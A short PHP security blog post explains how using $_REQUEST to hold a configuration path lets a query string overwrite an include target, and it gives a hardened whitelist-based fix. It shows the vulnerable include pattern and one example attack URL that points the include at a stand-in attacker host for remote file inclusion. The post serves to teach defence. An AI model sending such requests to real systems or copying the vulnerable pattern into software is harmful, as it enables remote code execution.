Security incident with variable overwriting
During our work we keep stumbling upon the whims of different web developers. The last thing that really surprised me was the use of the $_REQUEST superglobal array in PHP for storing global variables. This is not a good idea, and I'll try to explain why.
Sooner or later, every PHP developer has to decide where to store the global variables of his application. Usually the developers put all global application configuration variables in a separate file. The common practices are:
- Define ordinary variables and bring them into function scope later with the keyword 'global'
- Define PHP constants, because they have global scope
In our particular case, the developer chose yet another approach for storing the absolute path to the application: he used the superglobal array $_REQUEST for that purpose. The situation looks like this:
config.inc.php
<?php
...
// the "configuration value" is stored in a superglobal that request data also populates
$_REQUEST['lang_abspath'] = '/var/www/examp_site/eng.inc.php';
...
?>
other.php
<?php
...
// the include target is read back from the same superglobal
include($_REQUEST['lang_abspath']);
...
?>
So far, so good ... but let's think about the values stored in the $_REQUEST array. According to the language specification this is an associative array consisting of the contents of $_GET, $_POST, and $_COOKIE.
OK, let's go deeper. In the default setting (EGPCS) $_REQUEST is first populated with the data of $_ENV, and then with $_GET. If there are keys with the same name, the values from $_GET overwrite those from $_ENV; then $_REQUEST is populated with the values from $_POST, $_COOKIE and $_SERVER, and the same happens for every key with the same name.
So, let's use some imagination and consider the situation when someone requests other.php in the following way:
other.php?lang_abspath=http://hack.mack.com/evel_one.php
In this case the initial value of the $_REQUEST['lang_abspath'] variable will be overwritten by the value sent in the query string, and the remote file will be included and executed ...
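The hardened form of the same config/include pattern, as an added example that is not the original post's code: the application path lives in a PHP constant (global scope, and a request cannot reassign it), and the only request-controlled input is a language code checked against a whitelist. The constant, function and language file names are constructed for the example.

```php
<?php
// Added example, not the original post's code. The absolute path is a constant
// instead of an entry in $_REQUEST, so GET/POST/COOKIE data cannot replace it.
define('APP_ABSPATH', '/var/www/examp_site');   // was $_REQUEST['lang_abspath']

// Language files that may be included: code => file name under APP_ABSPATH
// (constructed list for the example).
const LANG_FILES = [
    'eng' => 'eng.inc.php',
    'bg'  => 'bg.inc.php',
];

/**
 * Resolve a request-supplied language code to a file that is safe to include,
 * or return null if the request does not name a known language.
 * The raw request value is never used as part of the path.
 */
function lang_file_for(array $request): ?string
{
    $code = $request['lang'] ?? 'eng';           // default language
    // is_string() first: lang[]=x would make $code an array
    if (!is_string($code) || !isset(LANG_FILES[$code])) {
        return null;                              // unknown code: refuse, do not guess
    }
    // Defence in depth: the resolved file must still lie inside APP_ABSPATH.
    $base = realpath(APP_ABSPATH);
    $real = realpath(APP_ABSPATH . '/' . LANG_FILES[$code]);
    if ($base === false || $real === false || strpos($real, $base . '/') !== 0) {
        return null;
    }
    return $real;
}

// Vulnerable pattern from the post, for contrast: the include target itself
// comes from a superglobal that request data populates.
//   include($_REQUEST['lang_abspath']);

// Hardened usage: only a whitelisted file under the constant path is included.
$file = lang_file_for($_REQUEST);
if ($file === null) {
    http_response_code(400);
    exit('unknown language');
}
include $file;
```

realpath() returns false for a file that does not exist, so on a test machine the language files must actually be present under APP_ABSPATH for the include to happen.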
Overwriting the values in global arrays is a topic of great importance when you have to rewrite an old PHP application that works with register_globals=on into an application that works with register_globals=off, especially if you plan to use import_request_variables() for quick fixes.
More on the import_request_variables() topic here:
http://www.wisec.it/vulns.php?id=10
Visitor:
We would like to see more ;)